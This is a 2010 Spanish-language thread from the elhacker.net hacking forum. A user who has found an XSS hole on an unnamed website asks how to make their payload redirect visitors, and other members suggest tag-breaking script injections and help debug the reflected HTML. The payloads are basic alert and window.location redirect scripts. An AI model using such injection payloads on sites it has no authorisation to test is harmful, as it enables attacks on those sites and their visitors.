elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Rompecabezas de Bitcoin, Medio millón USD en premios


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  Ayuda con XSS		0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Ayuda con XSS  (Leído 2,791 veces)
kamikazeeee

Desconectado Desconectado

Mensajes: 6


Ver Perfil
Ayuda con XSS
« en: 31 Octubre 2010, 06:03 am »
hola! les cuento, encontré una web vulnerable a xss, intenté de varias formas pero ninguna funcionó, Pero Sí con ésta:

Código:
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

muestra el alert.

ahora, quiziera redireccionar la página a otro lugar, cómo podría hacerlo?

intenté con
Código:
 </TITLE><SCRIPT>window.location = "http://www.url.com";</SCRIPT>
pero no va

Disculpas por la ignorancia, y gracias por la ayuda!
En línea
Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.723


<3


Ver Perfil WWW
Re: Ayuda con XSS
« Respuesta #1 en: 31 Octubre 2010, 16:53 pm »
Simon así es,
Código
  1. </title><script>window.location = "http://www.mozilla.com/es-MX/";</script>
« Última modificación: 31 Octubre 2010, 16:57 pm por Shell Root » En línea
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.
kamikazeeee

Desconectado Desconectado

Mensajes: 6


Ver Perfil
Re: Ayuda con XSS
« Respuesta #2 en: 31 Octubre 2010, 18:41 pm »
Cita de: Shell Root en 31 Octubre 2010, 16:53 pm
Simon así es,
Código
  1. </title><script>window.location = "http://www.mozilla.com/es-MX/";</script>

Eso es lo que dije que ya probé, y no funcionó :/
En línea
xassiz~


Desconectado Desconectado

Mensajes: 457



Ver Perfil WWW
Re: Ayuda con XSS
« Respuesta #3 en: 31 Octubre 2010, 20:08 pm »
Revisa el código que le queda a la página después de su ejecución, a ver dónde está el fallo :P
En línea
#ka0labs
#byte-inside
#twitter
kamikazeeee

Desconectado Desconectado

Mensajes: 6


Ver Perfil
Re: Ayuda con XSS
« Respuesta #4 en: 31 Octubre 2010, 20:28 pm »
El código queda así:

Código:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> 
<html xmlns="http://www.w3.org/1999/xhtml"> 
<head> 
<title></TITLE><SCRIPT>alert("XSS");</SCRIPT></title><meta content="</TITLE><SCRIPT>alert("XSS");</SCRIPT>" property="og:title"/><meta name="description" content="</TITLE><SCRIPT>alert("XSS");</SCRIPT>"
En línea
xassiz~


Desconectado Desconectado

Mensajes: 457



Ver Perfil WWW
Re: Ayuda con XSS
« Respuesta #5 en: 31 Octubre 2010, 21:37 pm »
Prueba:
Código
  1. </title>"><script>window.location.href='http://www.mozilla.com/es-MX/';</script>
  2.  
En línea
#ka0labs
#byte-inside
#twitter
kamikazeeee

Desconectado Desconectado

Mensajes: 6


Ver Perfil
Re: Ayuda con XSS
« Respuesta #6 en: 1 Noviembre 2010, 00:19 am »
no funcionó
En línea
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines